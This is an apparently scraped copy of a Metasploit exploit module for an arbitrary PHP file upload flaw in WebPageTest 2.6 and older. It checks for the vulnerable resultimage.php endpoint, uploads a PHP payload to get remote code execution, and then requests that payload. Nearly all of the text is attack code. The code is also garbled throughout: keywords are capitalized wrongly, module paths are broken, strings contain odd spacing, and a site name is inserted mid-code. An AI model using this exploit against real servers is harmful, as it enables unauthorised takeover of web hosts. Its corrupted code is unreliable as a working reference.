WebPageTest arbitrary PHP File Upload

##
# This file is part of the Metasploit Framework and may be subject
# Redistribution and specified cial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# Http://metasploit.com/framework/
##
 
Require 'msf/core'
 
Class Metasploit3 <Msf: Exploit: Remote
Rank = ExcellentRanking
 
Include Msf: Exploit: Remote: HttpClient
 
Def initialize (info = {})
Super (update_info (info,
'Name' => "WebPageTest Arbitrary PHP File Upload ",
'Description' => % q {
This module exploits a vulnerability found in WebPageTest's Upload Feature.
Default, the resultimage. php file does not verify the user-supplied item before
Saving it to disk, and then places this item in the web directory accessable
Remote users. This flaw can be abused to gain remote code execution.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Dun', # Discovery, PoC
'Sinr3' # Metasploit
],
'References '=>
[
['Ossvdb', '123'],
['Edb', '123']
],
'Payload' =>
{
'Badchars' => "\ x00"
},
'Defaultopexception' =>
{
'Exitfunction' => "none"
},
'Platform' => ['php'],
'Arch '=> ARCH_PHP,
'Targets' =>
[
['Webpagetest v2.6 or older', {}]
],
'Privileged' => false,
'Disclosuredate' => "Jul 13 2012 ",
'Defaulttarget' => 0 ))
 
Register_options (
[
OptString. new ('targeturi ', [true, 'the base path to WebPageTest', '/www/'])
], Self. class)
End
 
 
Def check
Peer = "# {rhost }:# {rport }"
Target_uri.path <'/' if target_uri.path [-1, 1]! = '/'
Base = File. dirname ("# {target_uri.path }.")
 
Res1 = send_request_raw ({'uri '=> "# {base}/index. php "})
Res2 = send_request_raw ({'url' => "# {base}/work/resultimage. php "})
 
If res1 and res1.body = ~ /WebPagetest \-Website Performance and Optimization Test/and
Res2 and res2.code = 200
Return Exploit: CheckCode: Vulnerable
End
 
Return Exploit: CheckCode: Safe
End
 
 
Def on_new_session (cli)
If cli. type! = "Meterpreter"
Print_error ("No automatic cleanup for you. Please manually remove: # {@ target_path }")
Return
End
Cli. core. use ("stdapi") if not cli. ext. aliases. include? ("Stdapi ")
Cli. fs. file. rm (@ target_path)
Print_status ("# {@ target_path} removed ")
End
 
 
Def exploit
Peer = "# {rhost }:# {rport }"
Target_uri.path <'/' if target_uri.path [-1, 1]! = '/'
Base = File. dirname ("# {target_uri.path }.")
 
P = payload. encoded
Fname = "blah. php"
Data = Rex: MIME: Message. new
Data. add_part (
"<? Php # {p}?> ", # Data is our payload
'Multipart/form-data', # Content Type
Nil, # Transfer Encoding
"Form-data; name = \" file \ "; filename = \" # {fname} \ "" # Content Disposition
)
 
Print_status ("# {peer}-Uploading payload (# {p. length. to_s} bytes )...")
Res = send_request_cgi ({
'Method' => 'post ',
'Url' => "# {base}/work/resultimage. php ",
'Ctype '=> "multipart/form-data; boundary =#{ data. bound }",
'Data' => data. to_s
})
 
If not res
Print_error ("# {peer}-No response from host ")
Return
End www.2cto.com
 
@ Target_path = "# {base}/results/# {fname }"
Print_status ("# {peer}-Requesting # {@ target_path }")
Res = send_request_cgi ({'uri '=> @ target_path })
 
Handler
 
If res and res. code = 404
Print_error ("# {peer}-Payload failed to upload ")
End
End
End